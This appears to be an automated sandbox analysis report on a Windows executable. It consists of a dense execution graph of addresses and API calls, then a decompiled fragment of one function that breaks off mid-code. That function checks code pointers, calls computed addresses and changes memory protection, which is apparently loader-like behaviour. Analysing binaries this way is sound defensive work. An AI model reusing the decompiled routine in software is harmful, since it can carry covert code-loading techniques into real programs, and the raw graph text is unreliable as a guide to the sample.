                                                                  execution_graph 4430 408d80 4431 408dd3 4430->4431 4433 408d98 4430->4433 4432 405d91 29 API calls 4431->4432 4437 408de3 4431->4437 4432->4437 4434 408e2a 4434->4433 4438 405df2 LeaveCriticalSection 4434->4438 4435 40648a 15 API calls 4435->4437 4437->4434 4437->4435 4438->4433 4325 405b04 4326 405b96 4325->4326 4328 405b22 4325->4328 4328->4326 4329 405a0c RtlUnwind 4328->4329 4330 405a24 4329->4330 4330->4328 4331 404705 4338 404f91 4331->4338 4333 404710 4334 40471e 4333->4334 4335 405bdc 7 API calls 4333->4335 4336 405c15 7 API calls 4334->4336 4335->4334 4337 404727 4336->4337 4341 404fa2 4338->4341 4340 404f9e 4340->4333 4350 405047 4341->4350 4344 404fb3 GetCurrentProcess TerminateProcess 4345 404fc4 4344->4345 4346 405035 ExitProcess 4345->4346 4347 40502e 4345->4347 4353 405050 4347->4353 4351 405d91 29 API calls 4350->4351 4352 404fa8 4351->4352 4352->4344 4352->4345 4356 405df2 LeaveCriticalSection 4353->4356 4355 405033 4355->4340 4356->4355 4045 404608 GetVersion 4076 4059ac 4045->4076 4047 404666 4048 404673 4047->4048 4049 40466b 4047->4049 4089 4049e6 4048->4089 4165 404735 4049->4165 4053 404678 4054 404684 4053->4054 4055 40467c 4053->4055 4099 40567b 4054->4099 4056 404735 8 API calls 4055->4056 4058 404683 4056->4058 4058->4054 4059 40468e GetCommandLineA 4113 405549 4059->4113 4063 4046a8 4145 405243 4063->4145 4065 4046ad 4066 4046b2 GetStartupInfoA 4065->4066 4158 4051eb 4066->4158 4068 4046c4 GetModuleHandleA 4162 402e73 4068->4162 4071 4046e8 4072 404f80 32 API calls 4071->4072 4073 4046f1 4072->4073 4074 405073 36 API calls 4073->4074 4075 404702 4074->4075 4077 4059c3 4076->4077 4078 405a02 4077->4078 4079 4059cc 4077->4079 4078->4047 4171 405864 4079->4171 4082 4059e8 4085 405a05 4082->4085 4086 407b99 5 API calls 4082->4086 4083 4059db 4183 407348 HeapAlloc 4083->4183 4085->4047 4087 4059e5 4086->4087 4087->4085 4088 4059f6 HeapDestroy 4087->4088 4088->4078 4192 405d68 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 4089->4192 4091 4049ec TlsAlloc 4092 404a36 4091->4092 4093 4049fc 4091->4093 4092->4053 4094 40608f 30 API calls 4093->4094 4095 404a05 4094->4095 4095->4092 4096 404a0d TlsSetValue 4095->4096 4096->4092 4097 404a1e 4096->4097 4098 404a24 GetCurrentThreadId 4097->4098 4098->4053 4100 40707a 29 API calls 4099->4100 4101 40568e 4100->4101 4102 40569c GetStartupInfoA 4101->4102 4103 404710 7 API calls 4101->4103 4105 4056ea 4102->4105 4106 4057bb 4102->4106 4103->4102 4105->4106 4109 40707a 29 API calls 4105->4109 4111 405761 4105->4111 4107 4057e6 GetStdHandle 4106->4107 4108 405826 SetHandleCount 4106->4108 4107->4106 4110 4057f4 GetFileType 4107->4110 4108->4059 4109->4105 4110->4106 4111->4106 4112 405783 GetFileType 4111->4112 4112->4111 4114 405564 GetEnvironmentStringsW 4113->4114 4115 405597 4113->4115 4116 405578 GetEnvironmentStrings 4114->4116 4117 40556c 4114->4117 4115->4117 4118 405588 4115->4118 4116->4118 4119 40469e 4116->4119 4120 4055b0 WideCharToMultiByte 4117->4120 4121 4055a4 GetEnvironmentStringsW 4117->4121 4118->4119 4122 40562a GetEnvironmentStrings 4118->4122 4127 405636 4118->4127 4136 4052fc 4119->4136 4124 4055e4 4120->4124 4125 405616 FreeEnvironmentStringsW 4120->4125 4121->4119 4121->4120 4122->4119 4122->4127 4126 40707a 29 API calls 4124->4126 4125->4119 4129 4055ea 4126->4129 4128 40707a 29 API calls 4127->4128 4134 405651 4128->4134 4129->4125 4130 4055f3 WideCharToMultiByte 4129->4130 4132 40560d 4130->4132 4133 405604 4130->4133 4131 405667 FreeEnvironmentStringsA 4131->4119 4132->4125 4135 4061cc 29 API calls 4133->4135 4134->4131 4135->4132 4137 405313 GetModuleFileNameA 4136->4137 4138 40530e 4136->4138 4140 405336 4137->4140 4193 40705e 4138->4193 4141 40707a 29 API calls 4140->4141 4142 405357 4141->4142 4143 404710 7 API calls 4142->4143 4144 405367 4142->4144 4143->4144 4144->4063 4146 405250 4145->4146 4148 405255 4145->4148 4147 40705e 48 API calls 4146->4147 4147->4148 4149 40707a 29 API calls 4148->4149 4150 405282 4149->4150 4152 404710 7 API calls 4150->4152 4157 405296 4150->4157 4151 4052d9 4153 4061cc 29 API calls 4151->4153 4152->4157 4154 4052e5 4153->4154 4154->4065 4155 40707a 29 API calls 4155->4157 4156 404710 7 API calls 4156->4157 4157->4151 4157->4155 4157->4156 4159 4051f4 4158->4159 4161 4051f9 4158->4161 4160 40705e 48 API calls 4159->4160 4160->4161 4161->4068 4222 402e8b 4162->4222 4164 402e7e ExitProcess 4166 404743 4165->4166 4167 40473e 4165->4167 4169 405c15 7 API calls 4166->4169 4168 405bdc 7 API calls 4167->4168 4168->4166 4170 40474c ExitProcess 4169->4170 4185 406060 4171->4185 4173 405871 GetVersionExA 4174 4058a7 GetEnvironmentVariableA 4173->4174 4175 40588d 4173->4175 4178 4058c6 4174->4178 4182 405984 4174->4182 4175->4174 4176 40589f 4175->4176 4176->4082 4176->4083 4179 40590b GetModuleFileNameA 4178->4179 4180 405903 4178->4180 4179->4180 4180->4182 4187 403b88 4180->4187 4182->4176 4190 405837 GetModuleHandleA 4182->4190 4184 407364 4183->4184 4184->4087 4186 40606c 4185->4186 4186->4173 4186->4186 4188 403b9f 53 API calls 4187->4188 4189 403b9b 4188->4189 4189->4182 4191 40584e 4190->4191 4191->4176 4192->4091 4194 407067 4193->4194 4195 40706e 4193->4195 4197 406c86 4194->4197 4195->4137 4198 405d91 29 API calls 4197->4198 4199 406c96 4198->4199 4208 406e33 4199->4208 4201 406cad 4221 405df2 LeaveCriticalSection 4201->4221 4204 406e2b 4204->4195 4206 406cd2 GetCPInfo 4207 406ce8 4206->4207 4207->4201 4213 406ed9 GetCPInfo 4207->4213 4209 406e53 4208->4209 4210 406e43 GetOEMCP 4208->4210 4211 406c9e 4209->4211 4212 406e58 GetACP 4209->4212 4210->4209 4211->4201 4211->4206 4211->4207 4212->4211 4214 406efc 4213->4214 4215 406fc4 4213->4215 4216 40489d 6 API calls 4214->4216 4215->4201 4217 406f78 4216->4217 4218 405e07 9 API calls 4217->4218 4219 406f9c 4218->4219 4220 405e07 9 API calls 4219->4220 4220->4215 4221->4204 4223 402ea7 4222->4223 4224 403231 4223->4224 4225 402ec2 HeapAlloc 4223->4225 4224->4164 4226 40321f HeapDestroy 4225->4226 4227 402edf HeapAlloc 4225->4227 4226->4224 4228 4031f7 HeapFree 4227->4228 4229 402f09 4227->4229 4228->4226 4242 403233 CreateIoCompletionPort 4229->4242 4232 403182 4249 40327f 4232->4249 4235 4031a9 4235->4228 4237 4031e7 HeapFree 4235->4237 4236 402f6c 4236->4232 4245 401b02 4236->4245 4252 40145c GetTickCount 4236->4252 4237->4235 4241 402fd7 4241->4236 4241->4241 4254 4032b7 4241->4254 4243 40145c GetTickCount 4242->4243 4244 403256 4243->4244 4244->4236 4247 401b14 4245->4247 4246 401ba4 4246->4241 4247->4246 4261 403317 4247->4261 4250 40319a HeapFree 4249->4250 4251 40328c FindCloseChangeNotification 4249->4251 4250->4235 4251->4250 4253 40146b 4252->4253 4253->4236 4255 4032c6 4254->4255 4256 4032cd GetQueuedCompletionStatus 4254->4256 4306 401bc8 4255->4306 4257 40330e GetLastError 4256->4257 4259 4032ea 4256->4259 4257->4259 4259->4241 4262 403330 4261->4262 4270 40344d 4261->4270 4272 401cd7 4262->4272 4265 401f24 78 API calls 4266 403372 4265->4266 4267 40338b GetSystemInfo VirtualQuery 4266->4267 4266->4270 4267->4270 4271 4033ad 4267->4271 4268 4033b6 KiUserExceptionDispatcher 4269 40342f VirtualQuery 4268->4269 4268->4271 4269->4270 4269->4271 4270->4247 4271->4268 4271->4269 4271->4270 4273 401ce8 4272->4273 4282 401cef 4272->4282 4273->4282 4285 401d8a 4273->4285 4275 401d13 4276 401d25 4275->4276 4277 401d1c 4275->4277 4297 401c4b HeapAlloc 4276->4297 4289 401c7d 4277->4289 4279 401d3a 4281 401d44 4279->4281 4298 401fc5 4279->4298 4281->4277 4284 401d74 4281->4284 4282->4265 4282->4270 4284->4282 4286 401d9a 4285->4286 4288 401e97 4285->4288 4286->4288 4301 401c4b HeapAlloc 4286->4301 4288->4275 4290 401c8a 4289->4290 4292 401c93 4289->4292 4290->4282 4291 401ca2 4293 401cb8 4291->4293 4303 401c64 RtlFreeHeap 4291->4303 4292->4291 4302 401c64 RtlFreeHeap 4292->4302 4293->4290 4304 401c64 RtlFreeHeap 4293->4304 4297->4279 4305 401c4b HeapAlloc 4298->4305 4300 401fdf 4300->4281 4301->4288 4302->4291 4303->4293 4304->4290 4305->4300 4307 401bd9 4306->4307 4308 40145c GetTickCount 4307->4308 4309 401be7 4307->4309 4308->4309 4309->4256 4310 403b4b 4311 403b84 4310->4311 4312 403b57 4310->4312 4313 403b68 GetProcessHeap HeapFree 4312->4313 4314 403b7b 4312->4314 4313->4314 4315 401c7d RtlFreeHeap 4314->4315 4315->4311 4369 404b2d 4374 40641b 4369->4374 4371 404b6d 4372 403dbb 6 API calls 4373 404b3b 4372->4373 4373->4371 4373->4372 4375 406439 InterlockedIncrement 4374->4375 4377 406426 4374->4377 4376 406455 InterlockedDecrement 4375->4376 4380 40645f 4375->4380 4378 405d91 29 API calls 4376->4378 4377->4373 4378->4380 4385 40648a 4380->4385 4382 406475 4391 405df2 LeaveCriticalSection 4382->4391 4383 40647f InterlockedDecrement 4383->4377 4386 40646c 4385->4386 4387 4064b7 4385->4387 4386->4382 4386->4383 4388 4064d5 4387->4388 4389 403dbb 6 API calls 4387->4389 4388->4386 4390 405e07 9 API calls 4388->4390 4389->4388 4390->4386 4391->4377 4405 404bed 4406 404c16 4405->4406 4407 404bfb 4405->4407 4415 406914 4406->4415 4412 4068e7 4407->4412 4410 404c04 4411 404c1f 4418 408616 4412->4418 4414 406903 4414->4410 4416 408616 6 API calls 4415->4416 4417 406930 4416->4417 4417->4411 4422 408651 4418->4422 4419 403dbb 6 API calls 4420 408906 4419->4420 4420->4419 4424 408951 4420->4424 4421 403dbb 6 API calls 4421->4422 4422->4420 4422->4421 4425 4088fe 4422->4425 4423 403dbb 6 API calls 4423->4424 4424->4423 4424->4425 4425->4414 4399 405fcf 4400 405fdd 4399->4400 4401 405fe1 LCMapStringW 4400->4401 4404 405f95 4400->4404 4402 405ff9 WideCharToMultiByte 4401->4402 4401->4404 4402->4404 4316 408e50 4317 408e61 4316->4317 4319 408e73 4316->4319 4318 405d91 29 API calls 4317->4318 4317->4319 4322 408ed1 4317->4322 4318->4322 4320 408f1f 4320->4319 4324 405df2 LeaveCriticalSection 4320->4324 4322->4320 4323 40648a 15 API calls 4322->4323 4323->4322 4324->4319 3751 403ad2 3752 403ade 3751->3752 3753 403ae9 3751->3753 3755 401f24 3752->3755 3756 401f38 3755->3756 3757 401f32 3755->3757 3756->3753 3757->3756 3759 402149 3757->3759 3761 40219f 3759->3761 3760 402270 3760->3756 3761->3760 3763 403484 3761->3763 3764 4034a1 3763->3764 3767 4034a8 3763->3767 3765 4037c2 IsBadCodePtr 3764->3765 3766 403724 IsBadCodePtr 3764->3766 3764->3767 3768 403525 3764->3768 3769 4036e8 3764->3769 3770 40353d 3764->3770 3772 403878 3764->3772 3778 403810 3764->3778 3782 403760 3764->3782 3765->3767 3771 4037da IsBadReadPtr 3765->3771 3766->3767 3773 40373c 3766->3773 3767->3761 3768->3767 3774 40352c 3768->3774 3769->3767 3779 4036fe 3769->3779 3792 4039bf 3770->3792 3771->3767 3772->3767 3780 4038ac GetProcessHeap HeapAlloc 3772->3780 3773->3767 3776 403747 VirtualProtect 3773->3776 3789 403968 HeapAlloc 3774->3789 3776->3767 3778->3767 3786 40385c IsBadStringPtrA 3778->3786 3783 403707 GetModuleHandleA 3779->3783 3780->3767 3784 4038c9 3780->3784 3781 403533 3781->3767 3782->3767 3785 403787 GetProcessHeap RtlAllocateHeap 3782->3785 3783->3767 3784->3781 3796 4010c8 lstrlenA 3784->3796 3785->3767 3785->3782 3786->3767 3787 40386d lstrlenA 3786->3787 3787->3772 3790 4039b9 3789->3790 3791 40398b InterlockedIncrement 3789->3791 3790->3781 3791->3790 3793 403a03 3792->3793 3794 4039cb 3792->3794 3793->3767 3794->3793 3795 4039e0 HeapFree 3794->3795 3795->3767 3797 4012a5 3796->3797 3798 4010e7 3796->3798 3797->3784 3798->3797 3799 4010f8 HeapAlloc 3798->3799 3800 40110d 3799->3800 3815 4012be 3800->3815 3802 401120 3802->3797 3823 403e30 3802->3823 3804 401293 HeapFree 3804->3797 3805 401157 lstrlenA 3806 40127b 3805->3806 3810 401146 3805->3810 3829 401084 3806->3829 3808 401279 3808->3804 3809 401009 HeapAlloc 3809->3810 3810->3804 3810->3805 3810->3806 3810->3808 3810->3809 3811 403dbb 6 API calls 3810->3811 3813 403e30 35 API calls 3810->3813 3814 40102c HeapReAlloc HeapAlloc 3810->3814 3826 403da4 3810->3826 3811->3810 3813->3810 3814->3810 3816 4012ce lstrlenA 3815->3816 3820 4013d5 3815->3820 3818 4012e4 3816->3818 3816->3820 3822 40135a 3818->3822 3834 403dbb 3818->3834 3819 4013bc lstrlenA 3819->3820 3820->3802 3821 403dbb 6 API calls 3821->3822 3822->3819 3822->3821 3850 404a4d GetLastError TlsGetValue 3823->3850 3825 403e41 3825->3810 3937 403b9f 3826->3937 3830 4010c6 3829->3830 3832 40108d 3829->3832 3830->3808 3831 4010b9 HeapFree 3831->3830 3832->3830 3832->3831 3833 4010ab HeapFree 3832->3833 3833->3832 3835 403dd9 3834->3835 3837 403dcd 3834->3837 3838 40489d 3835->3838 3837->3818 3839 4048ce GetStringTypeW 3838->3839 3843 4048e6 3838->3843 3840 4048ea GetStringTypeA 3839->3840 3839->3843 3840->3843 3844 4049d2 3840->3844 3841 404911 GetStringTypeA 3841->3844 3842 404935 3842->3844 3846 40494b MultiByteToWideChar 3842->3846 3843->3841 3843->3842 3844->3837 3846->3844 3847 40496f 3846->3847 3847->3844 3848 4049a9 MultiByteToWideChar 3847->3848 3848->3844 3849 4049c2 GetStringTypeW 3848->3849 3849->3844 3851 404aa8 SetLastError 3850->3851 3852 404a69 3850->3852 3851->3825 3861 40608f 3852->3861 3855 404aa0 3870 404710 3855->3870 3856 404a7a TlsSetValue 3856->3855 3857 404a8b 3856->3857 3860 404a91 GetCurrentThreadId 3857->3860 3860->3851 3862 4060c4 3861->3862 3863 405d91 29 API calls 3862->3863 3864 40617c HeapAlloc 3862->3864 3865 404a72 3862->3865 3876 4076e4 3862->3876 3882 406128 3862->3882 3885 407e91 3862->3885 3892 4061b1 3862->3892 3863->3862 3864->3862 3865->3855 3865->3856 3871 404719 3870->3871 3872 40471e 3870->3872 3917 405bdc 3871->3917 3923 405c15 3872->3923 3879 407716 3876->3879 3878 4077c4 3878->3862 3879->3878 3881 4077b5 3879->3881 3895 4079ed 3879->3895 3881->3878 3902 407a9e 3881->3902 3906 405df2 LeaveCriticalSection 3882->3906 3884 40612f 3884->3862 3890 407e9f 3885->3890 3886 408060 3907 407b99 3886->3907 3888 407f8b VirtualAlloc 3891 407f5c 3888->3891 3890->3886 3890->3888 3890->3891 3891->3862 3916 405df2 LeaveCriticalSection 3892->3916 3894 4061b8 3894->3862 3896 407a30 HeapAlloc 3895->3896 3897 407a00 HeapReAlloc 3895->3897 3898 407a80 3896->3898 3900 407a56 VirtualAlloc 3896->3900 3897->3898 3899 407a1f 3897->3899 3898->3881 3899->3896 3900->3898 3901 407a70 HeapFree 3900->3901 3901->3898 3903 407ab0 VirtualAlloc 3902->3903 3905 407af9 3903->3905 3905->3878 3906->3884 3908 407ba6 3907->3908 3909 407bad HeapAlloc 3907->3909 3910 407bca VirtualAlloc 3908->3910 3909->3910 3911 407c02 3909->3911 3912 407bea VirtualAlloc 3910->3912 3913 407cbf 3910->3913 3911->3891 3912->3911 3914 407cb1 VirtualFree 3912->3914 3913->3911 3915 407cc7 HeapFree 3913->3915 3914->3913 3915->3911 3916->3894 3918 405be6 3917->3918 3919 405c13 3918->3919 3920 405c15 7 API calls 3918->3920 3919->3872 3921 405bfd 3920->3921 3922 405c15 7 API calls 3921->3922 3922->3919 3925 405c28 3923->3925 3924 404727 3924->3851 3925->3924 3926 405d3f 3925->3926 3927 405c68 3925->3927 3928 405d52 GetStdHandle WriteFile 3926->3928 3927->3924 3929 405c74 GetModuleFileNameA 3927->3929 3928->3924 3930 405c8c 3929->3930 3932 4081bd 3930->3932 3933 4081ca LoadLibraryA 3932->3933 3934 40820c 3932->3934 3933->3934 3935 4081db GetProcAddress 3933->3935 3934->3924 3935->3934 3936 4081f2 GetProcAddress GetProcAddress 3935->3936 3936->3934 3939 403bb7 3937->3939 3938 403dbb 6 API calls 3938->3939 3939->3938 3941 403be7 3939->3941 3940 403dbb 6 API calls 3940->3941 3941->3940 3943 403d10 3941->3943 3945 403d1d 3941->3945 3946 404762 3941->3946 3943->3945 3957 404759 3943->3957 3945->3810 3947 404780 InterlockedIncrement 3946->3947 3950 40476d 3946->3950 3948 4047a6 3947->3948 3949 40479c InterlockedDecrement 3947->3949 3975 4047d1 3948->3975 3960 405d91 3949->3960 3950->3941 3954 4047c6 InterlockedDecrement 3954->3950 3955 4047bc 3981 405df2 LeaveCriticalSection 3955->3981 3958 404a4d 35 API calls 3957->3958 3959 40475e 3958->3959 3959->3945 3961 405de7 EnterCriticalSection 3960->3961 3962 405da9 3960->3962 3961->3948 3982 40707a 3962->3982 3964 405dbf 3967 405d91 27 API calls 3964->3967 3966 404710 7 API calls 3966->3964 3968 405dc7 3967->3968 3969 405dd8 3968->3969 3970 405dce InitializeCriticalSection 3968->3970 3985 4061cc 3969->3985 3971 405ddd 3970->3971 4002 405df2 LeaveCriticalSection 3971->4002 3974 405de5 3974->3961 3976 4047fc 3975->3976 3980 4047b3 3975->3980 3977 404818 3976->3977 3978 403dbb 6 API calls 3976->3978 3977->3980 4023 405e07 3977->4023 3978->3977 3980->3954 3980->3955 3981->3950 4003 40708c 3982->4003 3986 4062a6 3985->3986 3987 4061fa 3985->3987 3986->3971 3988 406204 3987->3988 3989 40623f 3987->3989 3991 405d91 28 API calls 3988->3991 3990 406230 3989->3990 3993 405d91 28 API calls 3989->3993 3990->3986 3992 406298 HeapFree 3990->3992 3995 40620b 3991->3995 3992->3986 3999 40624b 3993->3999 3994 406225 4013 406236 3994->4013 3995->3994 4007 4073bb 3995->4007 3998 406277 4020 40628e 3998->4020 3999->3998 4016 407e4c 3999->4016 4002->3974 4004 405db1 4003->4004 4006 407093 4003->4006 4004->3964 4004->3966 4005 4070b8 29 API calls 4005->4006 4006->4004 4006->4005 4008 4073f9 4007->4008 4012 4076af 4007->4012 4009 4075f5 VirtualFree 4008->4009 4008->4012 4010 407659 4009->4010 4011 407668 VirtualFree HeapFree 4010->4011 4010->4012 4011->4012 4012->3994 4014 405df2 LeaveCriticalSection 4013->4014 4015 40623d 4014->4015 4015->3990 4017 407e79 4016->4017 4019 407e8f 4016->4019 4018 407d33 VirtualFree HeapFree VirtualFree 4017->4018 4017->4019 4018->4019 4019->3998 4021 405df2 LeaveCriticalSection 4020->4021 4022 406295 4021->4022 4022->3990 4024 405e37 LCMapStringW 4023->4024 4025 405e53 4023->4025 4024->4025 4026 405e5b LCMapStringA 4024->4026 4028 405eb9 4025->4028 4029 405e9c LCMapStringA 4025->4029 4026->4025 4027 405f95 4026->4027 4027->3980 4028->4027 4030 405ecf MultiByteToWideChar 4028->4030 4029->4027 4030->4027 4031 405ef9 4030->4031 4031->4027 4032 405f2f MultiByteToWideChar 4031->4032 4032->4027 4033 405f48 LCMapStringW 4032->4033 4033->4027 4034 405f63 4033->4034 4035 405fa9 4034->4035 4036 405f69 4034->4036 4035->4027 4038 405fe1 LCMapStringW 4035->4038 4036->4027 4037 405f77 LCMapStringW 4036->4037 4037->4027 4038->4027 4039 405ff9 WideCharToMultiByte 4038->4039 4039->4027 4439 403a93 4440 403a9f 4439->4440 4442 403aaa 4439->4442 4441 401f24 78 API calls 4440->4441 4441->4442 4041 403a54 4042 403a60 4041->4042 4044 403a6b 4041->4044 4043 401f24 78 API calls 4042->4043 4043->4044 4392 403b35 4393 403b40 4392->4393 4394 403b49 4392->4394 4395 401c7d RtlFreeHeap 4393->4395 4395->4394 4448 4045b8 4449 4045bd 4448->4449 4452 404b04 GetModuleHandleA 4449->4452 4451 4045c2 4453 404b13 GetProcAddress 4452->4453 4454 404b23 4452->4454 4453->4454 4454->4451 4443 40499a 4444 4049a1 4443->4444 4445 4049d2 4444->4445 4446 4049a9 MultiByteToWideChar 4444->4446 4446->4445 4447 4049c2 GetStringTypeW 4446->4447 4447->4445 4357 405f1b 4358 405f2a 4357->4358 4359 405f95 4358->4359 4360 405f2f MultiByteToWideChar 4358->4360 4360->4359 4361 405f48 LCMapStringW 4360->4361 4361->4359 4362 405f63 4361->4362 4363 405f69 4362->4363 4365 405fa9 4362->4365 4363->4359 4364 405f77 LCMapStringW 4363->4364 4364->4359 4365->4359 4366 405fe1 LCMapStringW 4365->4366 4366->4359 4367 405ff9 WideCharToMultiByte 4366->4367 4367->4359 4396 406c3b 4397 404710 7 API calls 4396->4397 4398 406c42 4397->4398 4426 405afc 4429 405b04 4426->4429 4427 405b96 4428 405a0c RtlUnwind 4428->4429 4429->4427 4429->4428

                                                                  Executed Functions

                                                                  Function 00403484 Relevance: 16.9, APIs: 11, Instructions: 400memorystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403484-40349b 1 403931 0->1 2 4034a1 0->2 15 403933-403937 1->15 3 403810-403821 call 401f95 2->3 4 403760-403765 2->4 5 403882-403888 2->5 6 4037c2-4037d4 IsBadCodePtr 2->6 7 4036a2-4036b3 call 401f95 2->7 8 403724-403736 IsBadCodePtr 2->8 9 4034d4-4034e5 call 401f95 2->9 10 403525-40352a 2->10 11 4036e8-4036f8 call 401f95 2->11 12 4034a8-4034b9 call 401f95 2->12 13 40354d-403553 2->13 14 40353d-403541 call 4039bf 2->14 3->1 49 403827-40382d 3->49 4->1 28 40376b 4->28 5->1 24 40388e-403892 5->24 6->1 19 4037da-4037ee IsBadReadPtr 6->19 7->1 48 4036b9-4036c1 7->48 8->1 25 40373c-403741 8->25 47 40351d-403520 9->47 51 4034e7-4034f8 call 401f95 9->51 26 403535-403538 10->26 27 40352c-403533 call 403968 10->27 11->1 52 4036fe-40371f call 401f78 GetModuleHandleA 11->52 46 4034bb-4034d2 call 401f78 call 404560 12->46 12->47 16 403555-40355c 13->16 17 4035b8-4035bb 13->17 30 403546-403548 14->30 16->1 31 403562-403589 call 401f78 call 401f95 16->31 36 403620-403647 call 401f78 call 401f95 17->36 37 4035bd-4035c4 17->37 19->1 33 4037f4-4037ff 19->33 40 4038a4-4038a6 24->40 41 403894 24->41 25->1 42 403747-40375b VirtualProtect 25->42 26->15 27->30 44 40376e-403770 28->44 30->15 31->1 94 40358f-403592 31->94 33->1 73 403805-40380b 33->73 36->1 100 40364d-403652 36->100 37->1 50 4035ca-4035f1 call 401f78 call 401f95 37->50 40->1 55 4038ac-4038c7 GetProcessHeap HeapAlloc 40->55 54 403897-40389a 41->54 42->15 44->1 57 403776-40377c 44->57 104 40351a 46->104 47->15 48->1 61 4036c7-4036e3 call 401f78 call 403a07 48->61 49->1 62 403833-403856 call 401f78 49->62 50->1 107 4035f7-4035fc 50->107 51->47 89 4034fa-403515 call 401f78 * 2 call 403ee0 51->89 52->15 54->40 67 40389c-4038a2 54->67 55->1 68 4038c9-4038d1 55->68 69 4037a3-4037a9 57->69 70 40377e-403785 57->70 61->15 62->1 97 40385c-403867 IsBadStringPtrA 62->97 67->40 67->54 80 403921-40392f 68->80 81 4038d3-4038d6 68->81 69->44 70->69 82 403787-4037a1 GetProcessHeap RtlAllocateHeap 70->82 73->15 80->1 91 4038d9-4038ea call 401f78 81->91 82->69 83 4037ab-4037bd call 403ee0 82->83 83->15 89->104 91->80 110 4038ec-40391f call 4010c8 91->110 94->1 103 403598-4035b3 call 403ee0 94->103 97->1 106 40386d-403876 lstrlenA 97->106 100->1 109 403658-403660 100->109 103->15 104->47 112 403878 106->112 113 40387a-40387c 106->113 107->1 114 403602-40360f 107->114 109->1 116 403666 109->116 110->80 110->91 112->113 113->5 119 403611 114->119 120 403613-40361e 114->120 122 403669-40366b 116->122 119->120 126 403693-40369d call 403ee0 120->126 122->1 123 403671-403674 122->123 127 403676-403679 123->127 128 40367b-403688 123->128 126->15 127->122 130 40368a 128->130 131 40368c-403690 128->131 130->131 131->126
                                                                  C-Code - Quality: 70%
                                                                  			E00403484(void* __ecx, long _a4, signed int _a8) {
				CHAR* _v8;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				long _t155;
				intOrPtr* _t158;

				_t158 = _a8;
				_t155 = _a4;
				_t142 = 0xb;
				_t143 = _t142 -  *_t158;
				if(_t143 > 0xb) {
					L76:
					_t144 = 0;
				} else {
					switch( *((intOrPtr*)(_t143 * 4 +  &M00403938))) {
						case 0:
							__eax =  *(__esi + 4);
							__eflags = __eax - 8;
							if(__eax < 8) {
								__edx = 0;
								__eflags = __eax;
								if(__eax > 0) {
									__ecx = __esi + 8;
									while(1) {
										__eflags =  *__ecx;
										if( *__ecx == 0) {
											goto L69;
										}
										__edx = __edx + 1;
										__ecx =  &(__ecx[4]);
										__eflags = __edx - __eax;
										if(__edx < __eax) {
											continue;
										}
										goto L69;
									}
								}
								L69:
								__eflags = __edx - __eax;
								if(__edx == __eax) {
									__eax = 0x1c + __eax * 8;
									__eax = GetProcessHeap();
									__edi = __eax;
									__eflags = __edi;
									if(__edi != 0) {
										_a8 = _a8 & 0x00000000;
										__eflags =  *(__esi + 4);
										if( *(__esi + 4) > 0) {
											__eax = __esi + 8;
											_v8 = __esi + 8;
											while(1) {
												__eax = _v8;
												__eax = E00401F78( *_v8, _a4);
												_pop(__ecx);
												__eflags = __eax;
												_pop(__ecx);
												if(__eax == 0) {
													goto L75;
												}
												__ecx = _a8;
												_push(1);
												_pop(__edx);
												__edx = __edx << __cl;
												__ecx =  *(__edi + 0x10);
												_push(__eax);
												 *(__edi + 0xc) =  *(__edi + 0xc) | __edx;
												_t128 = __ecx * 8; // 0x14
												__edx = __edi + _t128 + 0x14;
												__ecx =  *(__edi + 0x10) + 1;
												_push(__edi + _t128 + 0x14);
												 *(__edi + 0x10) = __ecx;
												_push( *((intOrPtr*)(__ebx + 0xa4)));
												__eax = E004010C8(__ecx);
												_v8 =  &(_v8[4]);
												__esp = __esp + 0xc;
												_a8 = _a8 + 1;
												__eax = _a8;
												__eflags = _a8 -  *(__esi + 4);
												if(_a8 <  *(__esi + 4)) {
													continue;
												}
												goto L75;
											}
										}
										L75:
										__ecx =  *(__ebx + 0x58);
										__eax = __ebx + 0x58;
										 *__edi = __ecx;
										__ecx[4] = __edi;
										 *(__edi + 4) = __eax;
										 *__eax = __edi;
									}
								}
							}
							goto L76;
						case 1:
							__eax = E00401F95( *(__esi + 8),  *(__esi + 0xc), __edi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L76;
							} else {
								__eflags =  *(__ebx + 0x94) - __eax;
								if( *(__ebx + 0x94) == __eax) {
									goto L76;
								} else {
									__eax =  *(__esi + 4);
									_a4 =  *(__esi + 4);
									__eax = E00401F78( *(__esi + 8), __edi);
									__ebx =  *(__ebx + 0x94);
									__esi =  *(__esi + 0xc);
									__ebx = __ebx + _a4;
									__eflags = _a4;
									_pop(__ecx);
									__edi = __eax;
									_pop(__ecx);
									if(_a4 < 0) {
										goto L76;
									} else {
										__eax = IsBadStringPtrA(__ebx, 2);
										__eflags = __eax;
										if(__eax != 0) {
											goto L76;
										} else {
											__eax = lstrlenA(__ebx);
											__eflags = __eax - __esi;
											if(__eax < __esi) {
												__esi = __eax;
											}
											_push(__esi);
											_push(__ebx);
											_push(__edi);
											goto L36;
										}
									}
								}
							}
							goto L77;
						case 2:
							__edi =  *(__esi + 4);
							__edi =  *(__esi + 4) +  *(__ebx + 0x94);
							__eax = IsBadCodePtr(__edi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L76;
							} else {
								__esi =  *(__esi + 8);
								__esi = __esi +  *(__ebx + 0x94);
								__eax = IsBadReadPtr(__esi, 0xa);
								__eflags = __eax;
								if(__eax != 0) {
									goto L76;
								} else {
									_push(__esi);
									_push( *(__ebx + 0x94));
									__eax =  *__edi();
									__eflags = __eax;
									if(__eax == 0) {
										goto L76;
									} else {
										__eax = __eax -  *(__ebx + 0x94);
									}
								}
							}
							goto L77;
						case 3:
							__eax = __ebx + 0x50;
							__eflags = __eax -  *__eax;
							if(__eax !=  *__eax) {
								__edi =  *(__ebx + 0x54);
								while(1) {
									__eflags = __edi - __eax;
									if(__edi == __eax) {
										goto L76;
									}
									__eax =  *(__edi + 8);
									__eflags =  *(__edi + 8) -  *(__esi + 4);
									if( *(__edi + 8) !=  *(__esi + 4)) {
										L51:
										__edi =  *(__edi + 4);
										__eax = __ebx + 0x50;
										continue;
									} else {
										__eflags =  *(__ebx + 0xa8);
										if( *(__ebx + 0xa8) != 0) {
											goto L51;
										} else {
											__eax = GetProcessHeap();
											__eax = RtlAllocateHeap(__eax, 8,  *(__edi + 0x10)); // executed
											__eflags = __eax;
											 *(__ebx + 0xa8) = __eax;
											if(__eax != 0) {
												__eax = E00403EE0(__eax,  *(__edi + 0xc),  *(__edi + 0x10));
